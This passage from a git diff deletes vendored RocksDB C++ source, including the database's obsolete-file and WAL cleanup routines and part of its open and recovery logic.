-  std::lock_guard<std::mutex> lock(prep_heap_mutex_);
-  auto it = prepared_section_completed_.find(log);
-  assert(it != prepared_section_completed_.end());
-  it->second += 1;
-}
-
-void DBImpl::MarkLogAsContainingPrepSection(uint64_t log) {
-  assert(log != 0);
-  std::lock_guard<std::mutex> lock(prep_heap_mutex_);
-  min_log_with_prep_.push(log);
-  auto it = prepared_section_completed_.find(log);
-  if (it == prepared_section_completed_.end()) {
-    prepared_section_completed_[log] = 0;
-  }
-}
-
-uint64_t DBImpl::FindMinLogContainingOutstandingPrep() {
-
-  if (!allow_2pc()) {
-    return 0;
-  }
-
-  std::lock_guard<std::mutex> lock(prep_heap_mutex_);
-  uint64_t min_log = 0;
-
-  // first we look in the prepared heap where we keep
-  // track of transactions that have been prepared (written to WAL)
-  // but not yet committed.
-  while (!min_log_with_prep_.empty()) {
-    min_log = min_log_with_prep_.top();
-
-    auto it = prepared_section_completed_.find(min_log);
-
-    // value was marked as 'deleted' from heap
-    if (it != prepared_section_completed_.end() && it->second > 0) {
-      it->second -= 1;
-      min_log_with_prep_.pop();
-
-      // back to squere one...
-      min_log = 0;
-      continue;
-    } else {
-      // found a valid value
-      break;
-    }
-  }
-
-  return min_log;
-}
-
-uint64_t DBImpl::MinLogNumberToKeep() {
-  uint64_t log_number = versions_->MinLogNumber();
-
-  if (allow_2pc()) {
-    // if are 2pc we must consider logs containing prepared
-    // sections of outstanding transactions.
-    //
-    // We must check min logs with outstanding prep before we check
-    // logs referneces by memtables because a log referenced by the
-    // first data structure could transition to the second under us.
-    //
-    // TODO(horuff): iterating over all column families under db mutex.
-    // should find more optimial solution
-    auto min_log_in_prep_heap = FindMinLogContainingOutstandingPrep();
-
-    if (min_log_in_prep_heap != 0 && min_log_in_prep_heap < log_number) {
-      log_number = min_log_in_prep_heap;
-    }
-
-    auto min_log_refed_by_mem = FindMinPrepLogReferencedByMemTable();
-
-    if (min_log_refed_by_mem != 0 && min_log_refed_by_mem < log_number) {
-      log_number = min_log_refed_by_mem;
-    }
-  }
-  return log_number;
-}
-
-// * Returns the list of live files in 'sst_live'
-// If it's doing full scan:
-// * Returns the list of all files in the filesystem in
-// 'full_scan_candidate_files'.
-// Otherwise, gets obsolete files from VersionSet.
-// no_full_scan = true -- never do the full scan using GetChildren()
-// force = false -- don't force the full scan, except every
-//  mutable_db_options_.delete_obsolete_files_period_micros
-// force = true -- force the full scan
-void DBImpl::FindObsoleteFiles(JobContext* job_context, bool force,
-                               bool no_full_scan) {
-  mutex_.AssertHeld();
-
-  // if deletion is disabled, do nothing
-  if (disable_delete_obsolete_files_ > 0) {
-    return;
-  }
-
-  bool doing_the_full_scan = false;
-
-  // logic for figurint out if we're doing the full scan
-  if (no_full_scan) {
-    doing_the_full_scan = false;
-  } else if (force ||
-             mutable_db_options_.delete_obsolete_files_period_micros == 0) {
-    doing_the_full_scan = true;
-  } else {
-    const uint64_t now_micros = env_->NowMicros();
-    if ((delete_obsolete_files_last_run_ +
-         mutable_db_options_.delete_obsolete_files_period_micros) <
-        now_micros) {
-      doing_the_full_scan = true;
-      delete_obsolete_files_last_run_ = now_micros;
-    }
-  }
-
-  // don't delete files that might be currently written to from compaction
-  // threads
-  // Since job_context->min_pending_output is set, until file scan finishes,
-  // mutex_ cannot be released. Otherwise, we might see no min_pending_output
-  // here but later find newer generated unfinalized files while scannint.
-  if (!pending_outputs_.empty()) {
-    job_context->min_pending_output = *pending_outputs_.begin();
-  } else {
-    // delete all of them
-    job_context->min_pending_output = std::numeric_limits<uint64_t>::max();
-  }
-
-  // Get obsolete files.  This function will also update the list of
-  // pending files in VersionSet().
-  versions_->GetObsoleteFiles(&job_context->sst_delete_files,
-                              &job_context->manifest_delete_files,
-                              job_context->min_pending_output);
-
-  // store the current filenum, lognum, etc
-  job_context->manifest_file_number = versions_->manifest_file_number();
-  job_context->pending_manifest_file_number =
-      versions_->pending_manifest_file_number();
-  job_context->log_number = MinLogNumberToKeep();
-
-  job_context->prev_log_number = versions_->prev_log_number();
-
-  versions_->AddLiveFiles(&job_context->sst_live);
-  if (doing_the_full_scan) {
-    for (size_t path_id = 0; path_id < immutable_db_options_.db_paths.size();
-         path_id++) {
-      // set of all files in the directory. We'll exclude files that are still
-      // alive in the subsequent processings.
-      std::vector<std::string> files;
-      env_->GetChildren(immutable_db_options_.db_paths[path_id].path,
-                        &files);  // Ignore errors
-      for (std::string file : files) {
-        // TODO(icanadi) clean up this mess to avoid having one-off "/" prefixes
-        job_context->full_scan_candidate_files.emplace_back(
-            "/" + file, static_cast<uint32_t>(path_id));
-      }
-    }
-
-    // Add log files in wal_dir
-    if (immutable_db_options_.wal_dir != dbname_) {
-      std::vector<std::string> log_files;
-      env_->GetChildren(immutable_db_options_.wal_dir,
-                        &log_files);  // Ignore errors
-      for (std::string log_file : log_files) {
-        job_context->full_scan_candidate_files.emplace_back(log_file, 0);
-      }
-    }
-    // Add info log files in db_log_dir
-    if (!immutable_db_options_.db_log_dir.empty() &&
-        immutable_db_options_.db_log_dir != dbname_) {
-      std::vector<std::string> info_log_files;
-      // Ignore errors
-      env_->GetChildren(immutable_db_options_.db_log_dir, &info_log_files);
-      for (std::string log_file : info_log_files) {
-        job_context->full_scan_candidate_files.emplace_back(log_file, 0);
-      }
-    }
-  }
-
-  // logs_ is empty when called during recovery, in which case there can't yet
-  // be any tracked obsolete logs
-  if (!alive_log_files_.empty() && !logs_.empty()) {
-    uint64_t min_log_number = job_context->log_number;
-    size_t num_alive_log_files = alive_log_files_.size();
-    // find newly obsoleted log files
-    while (alive_log_files_.begin()->number < min_log_number) {
-      auto& earliest = *alive_log_files_.begin();
-      if (immutable_db_options_.recycle_log_file_num >
-          log_recycle_files.size()) {
-        ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                       "adding log %" PRIu64 " to recycle list\n",
-                       earliest.number);
-        log_recycle_files.push_back(earliest.number);
-      } else {
-        job_context->log_delete_files.push_back(earliest.number);
-      }
-      if (job_context->size_log_to_delete == 0) {
-        job_context->prev_total_log_size = total_log_size_;
-        job_context->num_alive_log_files = num_alive_log_files;
-      }
-      job_context->size_log_to_delete += earliest.size;
-      total_log_size_ -= earliest.size;
-      if (concurrent_prepare_) {
-        log_write_mutex_.Lock();
-      }
-      alive_log_files_.pop_front();
-      if (concurrent_prepare_) {
-        log_write_mutex_.Unlock();
-      }
-      // Current log should always stay alive since it can't have
-      // number < MinLogNumber().
-      assert(alive_log_files_.size());
-    }
-    while (!logs_.empty() && logs_.front().number < min_log_number) {
-      auto& log = logs_.front();
-      if (log.getting_synced) {
-        log_sync_cv_.Wait();
-        // logs_ could have changed while we were waiting.
-        continue;
-      }
-      logs_to_free_.push_back(log.ReleaseWriter());
-      {
-        InstrumentedMutexLock wl(&log_write_mutex_);
-        logs_.pop_front();
-      }
-    }
-    // Current log cannot be obsolete.
-    assert(!logs_.empty());
-  }
-
-  // We're just cleaning up for DB::Write().
-  assert(job_context->logs_to_free.empty());
-  job_context->logs_to_free = logs_to_free_;
-  job_context->log_recycle_files.assign(log_recycle_files.begin(),
-                                        log_recycle_files.end());
-  logs_to_free_.clear();
-}
-
-namespace {
-bool CompareCandidateFile(const JobContext::CandidateFileInfo& first,
-                          const JobContext::CandidateFileInfo& second) {
-  if (first.file_name > second.file_name) {
-    return true;
-  } else if (first.file_name < second.file_name) {
-    return false;
-  } else {
-    return (first.path_id > second.path_id);
-  }
-}
-};  // namespace
-
-// Delete obsolete files and log status and information of file deletion
-void DBImpl::DeleteObsoleteFileImpl(Status file_deletion_status, int job_id,
-                                    const std::string& fname, FileType type,
-                                    uint64_t number, uint32_t path_id) {
-  if (type == kTableFile) {
-    file_deletion_status =
-        DeleteSSTFile(&immutable_db_options_, fname, path_id);
-  } else {
-    file_deletion_status = env_->DeleteFile(fname);
-  }
-  if (file_deletion_status.ok()) {
-    ROCKS_LOG_DEBUG(immutable_db_options_.info_log,
-                    "[JOB %d] Delete %s type=%d #%" PRIu64 " -- %s\n", job_id,
-                    fname.c_str(), type, number,
-                    file_deletion_status.ToString().c_str());
-  } else if (env_->FileExists(fname).IsNotFound()) {
-    ROCKS_LOG_INFO(
-        immutable_db_options_.info_log,
-        "[JOB %d] Tried to delete a non-existing file %s type=%d #%" PRIu64
-        " -- %s\n",
-        job_id, fname.c_str(), type, number,
-        file_deletion_status.ToString().c_str());
-  } else {
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "[JOB %d] Failed to delete %s type=%d #%" PRIu64 " -- %s\n",
-                    job_id, fname.c_str(), type, number,
-                    file_deletion_status.ToString().c_str());
-  }
-  if (type == kTableFile) {
-    EventHelpers::LogAndNotifyTableFileDeletion(
-        &event_logger_, job_id, number, fname, file_deletion_status, GetName(),
-        immutable_db_options_.listeners);
-  }
-}
-
-// Diffs the files listed in filenames and those that do not
-// belong to live files are posibly removed. Also, removes all the
-// files in sst_delete_files and log_delete_files.
-// It is not necessary to hold the mutex when invoking this method.
-void DBImpl::PurgeObsoleteFiles(const JobContext& state, bool schedule_only) {
-  // we'd better have sth to delete
-  assert(state.HaveSomethingToDelete());
-
-  // this checks if FindObsoleteFiles() was run before. If not, don't do
-  // PurgeObsoleteFiles(). If FindObsoleteFiles() was run, we need to also
-  // run PurgeObsoleteFiles(), even if disable_delete_obsolete_files_ is true
-  if (state.manifest_file_number == 0) {
-    return;
-  }
-
-  // Now, convert live list to an unordered map, WITHOUT mutex held;
-  // set is slow.
-  std::unordered_map<uint64_t, const FileDescriptor*> sst_live_map;
-  for (const FileDescriptor& fd : state.sst_live) {
-    sst_live_map[fd.GetNumber()] = &fd;
-  }
-  std::unordered_set<uint64_t> log_recycle_files_set(
-      state.log_recycle_files.begin(), state.log_recycle_files.end());
-
-  auto candidate_files = state.full_scan_candidate_files;
-  candidate_files.reserve(
-      candidate_files.size() + state.sst_delete_files.size() +
-      state.log_delete_files.size() + state.manifest_delete_files.size());
-  // We may ignore the dbname when generating the file names.
-  const char* kDumbDbName = "";
-  for (auto file : state.sst_delete_files) {
-    candidate_files.emplace_back(
-        MakeTableFileName(kDumbDbName, file->fd.GetNumber()),
-        file->fd.GetPathId());
-    if (file->table_reader_handle) {
-      table_cache_->Release(file->table_reader_handle);
-    }
-    delete file;
-  }
-
-  for (auto file_num : state.log_delete_files) {
-    if (file_num > 0) {
-      candidate_files.emplace_back(LogFileName(kDumbDbName, file_num), 0);
-    }
-  }
-  for (const auto& filename : state.manifest_delete_files) {
-    candidate_files.emplace_back(filename, 0);
-  }
-
-  // dedup state.candidate_files so we don't try to delete the same
-  // file twice
-  std::sort(candidate_files.begin(), candidate_files.end(),
-            CompareCandidateFile);
-  candidate_files.erase(
-      std::unique(candidate_files.begin(), candidate_files.end()),
-      candidate_files.end());
-
-  if (state.prev_total_log_size > 0) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[JOB %d] Try to delete WAL files size %" PRIu64
-                   ", prev total WAL file size %" PRIu64
-                   ", number of live WAL files %" ROCKSDB_PRIszt ".\n",
-                   state.job_id, state.size_log_to_delete,
-                   state.prev_total_log_size, state.num_alive_log_files);
-  }
-
-  std::vector<std::string> old_info_log_files;
-  InfoLogPrefix info_log_prefix(!immutable_db_options_.db_log_dir.empty(),
-                                dbname_);
-  for (const auto& candidate_file : candidate_files) {
-    std::string to_delete = candidate_file.file_name;
-    uint32_t path_id = candidate_file.path_id;
-    uint64_t number;
-    FileType type;
-    // Ignore file if we cannot recognize it.
-    if (!ParseFileName(to_delete, &number, info_log_prefix.prefix, &type)) {
-      continue;
-    }
-
-    bool keep = true;
-    switch (type) {
-      case kLogFile:
-        keep = ((number >= state.log_number) ||
-                (number == state.prev_log_number) ||
-                (log_recycle_files_set.find(number) !=
-                 log_recycle_files_set.end()));
-        break;
-      case kDescriptorFile:
-        // Keep my manifest file, and any newer incarnations'
-        // (can happen during manifest roll)
-        keep = (number >= state.manifest_file_number);
-        break;
-      case kTableFile:
-        // If the second condition is not there, this makes
-        // DontDeletePendingOutputs fail
-        keep = (sst_live_map.find(number) != sst_live_map.end()) ||
-               number >= state.min_pending_output;
-        break;
-      case kTempFile:
-        // Any temp files that are currently being written to must
-        // be recorded in pending_outputs_, which is inserted into "live".
-        // Also, SetCurrentFile creates a temp file when writing out new
-        // manifest, which is equal to state.pending_manifest_file_number. We
-        // should not delete that file
-        //
-        // TODO(yhchiang): carefully modify the third condition to safely
-        //                 remove the temp options files.
-        keep = (sst_live_map.find(number) != sst_live_map.end()) ||
-               (number == state.pending_manifest_file_number) ||
-               (to_delete.find(kOptionsFileNamePrefix) != std::string::npos);
-        break;
-      case kInfoLogFile:
-        keep = true;
-        if (number != 0) {
-          old_info_log_files.push_back(to_delete);
-        }
-        break;
-      case kCurrentFile:
-      case kDBLockFile:
-      case kIdentityFile:
-      case kMetaDatabase:
-      case kOptionsFile:
-      case kBlobFile:
-        keep = true;
-        break;
-    }
-
-    if (keep) {
-      continue;
-    }
-
-    std::string fname;
-    if (type == kTableFile) {
-      // evict from cache
-      TableCache::Evict(table_cache_.get(), number);
-      fname = TableFileName(immutable_db_options_.db_paths, number, path_id);
-    } else {
-      fname = ((type == kLogFile) ? immutable_db_options_.wal_dir : dbname_) +
-              "/" + to_delete;
-    }
-
-#ifndef ROCKSDB_LITE
-    if (type == kLogFile && (immutable_db_options_.wal_ttl_seconds > 0 ||
-                             immutable_db_options_.wal_size_limit_mb > 0)) {
-      wal_manager_.ArchiveWALFile(fname, number);
-      continue;
-    }
-#endif  // !ROCKSDB_LITE
-
-    Status file_deletion_status;
-    if (schedule_only) {
-      InstrumentedMutexLock guard_lock(&mutex_);
-      SchedulePendingPurge(fname, type, number, path_id, state.job_id);
-    } else {
-      DeleteObsoleteFileImpl(file_deletion_status, state.job_id, fname, type,
-                             number, path_id);
-    }
-  }
-
-  // Delete old info log files.
-  size_t old_info_log_file_count = old_info_log_files.size();
-  if (old_info_log_file_count != 0 &&
-      old_info_log_file_count >= immutable_db_options_.keep_log_file_num) {
-    std::sort(old_info_log_files.begin(), old_info_log_files.end());
-    size_t end =
-        old_info_log_file_count - immutable_db_options_.keep_log_file_num;
-    for (unsigned int i = 0; i <= end; i++) {
-      std::string& to_delete = old_info_log_files.at(i);
-      std::string full_path_to_delete =
-          (immutable_db_options_.db_log_dir.empty()
-               ? dbname_
-               : immutable_db_options_.db_log_dir) +
-          "/" + to_delete;
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "[JOB %d] Delete info log file %s\n", state.job_id,
-                     full_path_to_delete.c_str());
-      Status s = env_->DeleteFile(full_path_to_delete);
-      if (!s.ok()) {
-        if (env_->FileExists(full_path_to_delete).IsNotFound()) {
-          ROCKS_LOG_INFO(
-              immutable_db_options_.info_log,
-              "[JOB %d] Tried to delete non-existing info log file %s FAILED "
-              "-- %s\n",
-              state.job_id, to_delete.c_str(), s.ToString().c_str());
-        } else {
-          ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                          "[JOB %d] Delete info log file %s FAILED -- %s\n",
-                          state.job_id, to_delete.c_str(),
-                          s.ToString().c_str());
-        }
-      }
-    }
-  }
-#ifndef ROCKSDB_LITE
-  wal_manager_.PurgeObsoleteWALFiles();
-#endif  // ROCKSDB_LITE
-  LogFlush(immutable_db_options_.info_log);
-}
-
-void DBImpl::DeleteObsoleteFiles() {
-  mutex_.AssertHeld();
-  JobContext job_context(next_job_id_.fetch_add(1));
-  FindObsoleteFiles(&job_context, true);
-
-  mutex_.Unlock();
-  if (job_context.HaveSomethingToDelete()) {
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  mutex_.Lock();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_open.cc b/thirdparty/rocksdb/db/db_impl_open.cc
deleted file mode 100644
index bc94b60..0000000
--- a/thirdparty/rocksdb/db/db_impl_open.cc
+++ /dev/null
@@ -1,1129 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-
-#include "db/builder.h"
-#include "options/options_helper.h"
-#include "rocksdb/wal_filter.h"
-#include "table/block_based_table_factory.h"
-#include "util/rate_limiter.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-Options SanitizeOptions(const std::string& dbname,
-                        const Options& src) {
-  auto db_options = SanitizeOptions(dbname, DBOptions(src));
-  ImmutableDBOptions immutable_db_options(db_options);
-  auto cf_options =
-      SanitizeOptions(immutable_db_options, ColumnFamilyOptions(src));
-  return Options(db_options, cf_options);
-}
-
-DBOptions SanitizeOptions(const std::string& dbname, const DBOptions& src) {
-  DBOptions result(src);
-
-  // result.max_open_files means an "infinite" open files.
-  if (result.max_open_files != -1) {
-    int max_max_open_files = port::GetMaxOpenFiles();
-    if (max_max_open_files == -1) {
-      max_max_open_files = 0x400000;
-    }
-    ClipToRange(&result.max_open_files, 20, max_max_open_files);
-  }
-
-  if (result.info_log == nullptr) {
-    Status s = CreateLoggerFromOptions(dbname, result, &result.info_log);
-    if (!s.ok()) {
-      // No place suitable for logging
-      result.info_log = nullptr;
-    }
-  }
-
-  if (!result.write_buffer_manager) {
-    result.write_buffer_manager.reset(
-        new WriteBufferManager(result.db_write_buffer_size));
-  }
-  auto bg_job_limits = DBImpl::GetBGJobLimits(result.max_background_flushes,
-                                              result.max_background_compactions,
-                                              result.max_background_jobs,
-                                              true /* parallelize_compactions */);
-  result.env->IncBackgroundThreadsIfNeeded(bg_job_limits.max_compactions,
-                                           Env::Priority::LOW);
-  result.env->IncBackgroundThreadsIfNeeded(bg_job_limits.max_flushes,
-                                           Env::Priority::HIGH);
-
-  if (result.rate_limiter.get() != nullptr) {
-    if (result.bytes_per_sync == 0) {
-      result.bytes_per_sync = 1024 * 1024;
-    }
-  }
-
-  if (result.delayed_write_rate == 0) {
-    if (result.rate_limiter.get() != nullptr) {
-      result.delayed_write_rate = result.rate_limiter->GetBytesPerSecond();
-    }
-    if (result.delayed_write_rate == 0) {
-      result.delayed_write_rate = 16 * 1024 * 1024;
-    }
-  }
-
-  if (result.WAL_ttl_seconds > 0 || result.WAL_size_limit_MB > 0) {
-    result.recycle_log_file_num = false;
-  }
-
-  if (result.recycle_log_file_num &&
-      (result.wal_recovery_mode == WALRecoveryMode::kPointInTimeRecovery ||
-       result.wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency)) {
-    // kPointInTimeRecovery is indistinguishable from
-    // kTolerateCorruptedTailRecords in recycle mode since we define
-    // the "end" of the log as the first corrupt record we encounter.
-    // kAbsoluteConsistency doesn't make sense because even a clean
-    // shutdown leaves old junk at the end of the log file.
-    result.wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-  }
-
-  if (result.wal_dir.empty()) {
-    // Use dbname as default
-    result.wal_dir = dbname;
-  }
-  if (result.wal_dir.back() == '/') {
-    result.wal_dir = result.wal_dir.substr(0, result.wal_dir.size() - 1);
-  }
-
-  if (result.db_paths.size() == 0) {
-    result.db_paths.emplace_back(dbname, std::numeric_limits<uint64_t>::max());
-  }
-
-  if (result.use_direct_io_for_flush_and_compaction &&
-      result.compaction_readahead_size == 0) {
-    TEST_SYNC_POINT_CALLBACK("SanitizeOptions:direct_io", nullptr);
-    result.compaction_readahead_size = 1024 * 1024 * 2;
-  }
-
-  if (result.compaction_readahead_size > 0 ||
-      result.use_direct_io_for_flush_and_compaction) {
-    result.new_table_reader_for_compaction_inputs = true;
-  }
-
-  // Force flush on DB open if 2PC is enabled, since with 2PC we have no
-  // guarantee that consecutive log files have consecutive sequence id, which
-  // make recovery complicated.
-  if (result.allow_2pc) {
-    result.avoid_flush_during_recovery = false;
-  }
-
-  return result;
-}
-
-namespace {
-
-Status SanitizeOptionsByTable(
-    const DBOptions& db_opts,
-    const std::vector<ColumnFamilyDescriptor>& column_families) {
-  Status s;
-  for (auto cf : column_families) {
-    s = cf.options.table_factory->SanitizeOptions(db_opts, cf.options);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  return Status::OK();
-}
-
-static Status ValidateOptions(
-    const DBOptions& db_options,
-    const std::vector<ColumnFamilyDescriptor>& column_families) {
-  Status s;
-
-  for (auto& cfd : column_families) {
-    s = CheckCompressionSupported(cfd.options);
-    if (s.ok() && db_options.allow_concurrent_memtable_write) {
-      s = CheckConcurrentWritesSupported(cfd.options);
-    }
-    if (!s.ok()) {
-      return s;
-    }
-    if (db_options.db_paths.size() > 1) {
-      if ((cfd.options.compaction_style != kCompactionStyleUniversal) &&
-          (cfd.options.compaction_style != kCompactionStyleLevel)) {
-        return Status::NotSupported(
-            "More than one DB paths are only supported in "
-            "universal and level compaction styles. ");
-      }
-    }
-    if (cfd.options.compaction_options_fifo.ttl > 0) {
-      if (db_options.max_open_files != -1) {
-        return Status::NotSupported(
-            "FIFO Compaction with TTL is only supported when files are always "
-            "kept open (set max_open_files = -1). ");
-      }
-      if (cfd.options.table_factory->Name() !=
-          BlockBasedTableFactory().Name()) {
-        return Status::NotSupported(
-            "FIFO Compaction with TTL is only supported in "
-            "Block-Based Table format. ");
-      }
-    }
-  }
-
-  if (db_options.db_paths.size() > 4) {
-    return Status::NotSupported(
-        "More than four DB paths are not supported yet. ");
-  }
-
-  if (db_options.allow_mmap_reads && db_options.use_direct_reads) {
-    // Protect against assert in PosixMMapReadableFile constructor
-    return Status::NotSupported(
-        "If memory mapped reads (allow_mmap_reads) are enabled "
-        "then direct I/O reads (use_direct_reads) must be disabled. ");
-  }
-
-  if (db_options.allow_mmap_writes &&
-      db_options.use_direct_io_for_flush_and_compaction) {
-    return Status::NotSupported(
-        "If memory mapped writes (allow_mmap_writes) are enabled "
-        "then direct I/O writes (use_direct_io_for_flush_and_compaction) must "
-        "be disabled. ");
-  }
-
-  if (db_options.keep_log_file_num == 0) {
-    return Status::InvalidArgument("keep_log_file_num must be greater than 0");
-  }
-
-  return Status::OK();
-}
-} // namespace
-Status DBImpl::NewDB() {
-  VersionEdit new_db;
-  new_db.SetLogNumber(0);
-  new_db.SetNextFile(2);
-  new_db.SetLastSequence(0);
-
-  Status s;
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log, "Creating manifest 1 \n");
-  const std::string manifest = DescriptorFileName(dbname_, 1);
-  {
-    unique_ptr<WritableFile> file;
-    EnvOptions env_options = env_->OptimizeForManifestWrite(env_options_);
-    s = NewWritableFile(env_, manifest, &file, env_options);
-    if (!s.ok()) {
-      return s;
-    }
-    file->SetPreallocationBlockSize(
-        immutable_db_options_.manifest_preallocation_size);
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), env_options));
-    log::Writer log(std::move(file_writer), 0, false);
-    std::string record;
-    new_db.EncodeTo(&record);
-    s = log.AddRecord(record);
-    if (s.ok()) {
-      s = SyncManifest(env_, &immutable_db_options_, log.file());
-    }
-  }
-  if (s.ok()) {
-    // Make "CURRENT" file that points to the new manifest file.
-    s = SetCurrentFile(env_, dbname_, 1, directories_.GetDbDir());
-  } else {
-    env_->DeleteFile(manifest);
-  }
-  return s;
-}
-
-Status DBImpl::Directories::CreateAndNewDirectory(
-    Env* env, const std::string& dirname,
-    std::unique_ptr<Directory>* directory) const {
-  // We call CreateDirIfMissing() as the directory may already exist (if we
-  // are reopening a DB), when this happens we don't want creating the
-  // directory to cause an error. However, we need to check if creating the
-  // directory fails or else we may get an obscure message about the lock
-  // file not existing. One real-world example of this occurring is if
-  // env->CreateDirIfMissing() doesn't create intermediate directories, e.g.
-  // when dbname_ is "dir/db" but when "dir" doesn't exist.
-  Status s = env->CreateDirIfMissing(dirname);
-  if (!s.ok()) {
-    return s;
-  }
-  return env->NewDirectory(dirname, directory);
-}
-
-Status DBImpl::Directories::SetDirectories(
-    Env* env, const std::string& dbname, const std::string& wal_dir,
-    const std::vector<DbPath>& data_paths) {
-  Status s = CreateAndNewDirectory(env, dbname, &db_dir_);
-  if (!s.ok()) {
-    return s;
-  }
-  if (!wal_dir.empty() && dbname != wal_dir) {
-    s = CreateAndNewDirectory(env, wal_dir, &wal_dir_);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  data_dirs_.clear();
-  for (auto& p : data_paths) {
-    const std::string db_path = p.path;
-    if (db_path == dbname) {
-      data_dirs_.emplace_back(nullptr);
-    } else {
-      std::unique_ptr<Directory> path_directory;
-      s = CreateAndNewDirectory(env, db_path, &path_directory);
-      if (!s.ok()) {
-        return s;
-      }
-      data_dirs_.emplace_back(path_directory.release());
-    }
-  }
-  assert(data_dirs_.size() == data_paths.size());
-  return Status::OK();
-}
-
-Status DBImpl::Recover(
-    const std::vector<ColumnFamilyDescriptor>& column_families, bool read_only,
-    bool error_if_log_file_exist, bool error_if_data_exists_in_logs) {
-  mutex_.AssertHeld();
-
-  bool is_new_db = false;
-  assert(db_lock_ == nullptr);
-  if (!read_only) {
-    Status s = directories_.SetDirectories(env_, dbname_,
-                                           immutable_db_options_.wal_dir,
-                                           immutable_db_options_.db_paths);
-    if (!s.ok()) {
-      return s;
-    }
-
-    s = env_->LockFile(LockFileName(dbname_), &db_lock_);
-    if (!s.ok()) {
-      return s;
-    }
-
-    s = env_->FileExists(CurrentFileName(dbname_));
-    if (s.IsNotFound()) {
-      if (immutable_db_options_.create_if_missing) {
-        s = NewDB();
-        is_new_db = true;
-        if (!s.ok()) {
-          return s;
-        }
-      } else {
-        return Status::InvalidArgument(
-            dbname_, "does not exist (create_if_missing is false)");
-      }
-    } else if (s.ok()) {
-      if (immutable_db_options_.error_if_exists) {
-        return Status::InvalidArgument(
-            dbname_, "exists (error_if_exists is true)");
-      }
-    } else {
-      // Unexpected error reading file
-      assert(s.IsIOError());
-      return s;
-    }
-    // Check for the IDENTITY file and create it if not there
-    s = env_->FileExists(IdentityFileName(dbname_));
-    if (s.IsNotFound()) {
-      s = SetIdentityFile(env_, dbname_);
-      if (!s.ok()) {
-        return s;
-      }
-    } else if (!s.ok()) {
-      assert(s.IsIOError());
-      return s;
-    }
-  }
-
-  Status s = versions_->Recover(column_families, read_only);
-  if (immutable_db_options_.paranoid_checks && s.ok()) {
-    s = CheckConsistency();
-  }
-  if (s.ok()) {
-    SequenceNumber next_sequence(kMaxSequenceNumber);
-    default_cf_handle_ = new ColumnFamilyHandleImpl(
-        versions_->GetColumnFamilySet()->GetDefault(), this, &mutex_);
-    default_cf_internal_stats_ = default_cf_handle_->cfd()->internal_stats();
-    single_column_family_mode_ =
-        versions_->GetColumnFamilySet()->NumberOfColumnFamilies() == 1;
-
-    // Recover from all newer log files than the ones named in the
-    // descriptor (new log files may have been added by the previous
-    // incarnation without registering them in the descriptor).
-    //
-    // Note that prev_log_number() is no longer used, but we pay
-    // attention to it in case we are recovering a database
-    // produced by an older version of rocksdb.
-    std::vector<std::string> filenames;
-    s = env_->GetChildren(immutable_db_options_.wal_dir, &filenames);
-    if (!s.ok()) {
-      return s;
-    }
-
-    std::vector<uint64_t> logs;
-    for (size_t i = 0; i < filenames.size(); i++) {
-      uint64_t number;
-      FileType type;
-      if (ParseFileName(filenames[i], &number, &type) && type == kLogFile) {
-        if (is_new_db) {
-          return Status::Corruption(
-              "While creating a new Db, wal_dir contains "
-              "existing log file: ",
-              filenames[i]);
-        } else {
-          logs.push_back(number);
-        }
-      }
-    }
-
-    if (logs.size() > 0) {
-      if (error_if_log_file_exist) {
-        return Status::Corruption(
-            "The db was opened in readonly mode with error_if_log_file_exist"
-            "flag but a log file already exists");
-      } else if (error_if_data_exists_in_logs) {
-        for (auto& log : logs) {
-          std::string fname = LogFileName(immutable_db_options_.wal_dir, log);
-          uint64_t bytes;
-          s = env_->GetFileSize(fname, &bytes);
-          if (s.ok()) {
-            if (bytes > 0) {
-              return Status::Corruption(
-                  "error_if_data_exists_in_logs is set but there are data "
-                  " in log files.");
-            }
-          }
-        }
-      }
-    }
-
-    if (!logs.empty()) {
-      // Recover in the order in which the logs were generated
-      std::sort(logs.begin(), logs.end());
-      s = RecoverLogFiles(logs, &next_sequence, read_only);
-      if (!s.ok()) {
-        // Clear memtables if recovery failed
-        for (auto cfd : *versions_->GetColumnFamilySet()) {
-          cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                 kMaxSequenceNumber);
-        }
-      }
-    }
-  }
-
-  // Initial value
-  max_total_in_memory_state_ = 0;
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-    max_total_in_memory_state_ += mutable_cf_options->write_buffer_size *
-                                  mutable_cf_options->max_write_buffer_number;
-  }
-
-  return s;
-}
-
-// REQUIRES: log_numbers are sorted in ascending order
-Status DBImpl::RecoverLogFiles(const std::vector<uint64_t>& log_numbers,
-                               SequenceNumber* next_sequence, bool read_only) {
-  struct LogReporter : public log::Reader::Reporter {
-    Env* env;
-    Logger* info_log;
-    const char* fname;
-    Status* status;  // nullptr if immutable_db_options_.paranoid_checks==false
-    virtual void Corruption(size_t bytes, const Status& s) override {
-      ROCKS_LOG_WARN(info_log, "%s%s: dropping %d bytes; %s",
-                     (this->status == nullptr ? "(ignoring error) " : ""),
-                     fname, static_cast<int>(bytes), s.ToString().c_str());
-      if (this->status != nullptr && this->status->ok()) {
-        *this->status = s;
-      }
-    }
-  };
-
-  mutex_.AssertHeld();
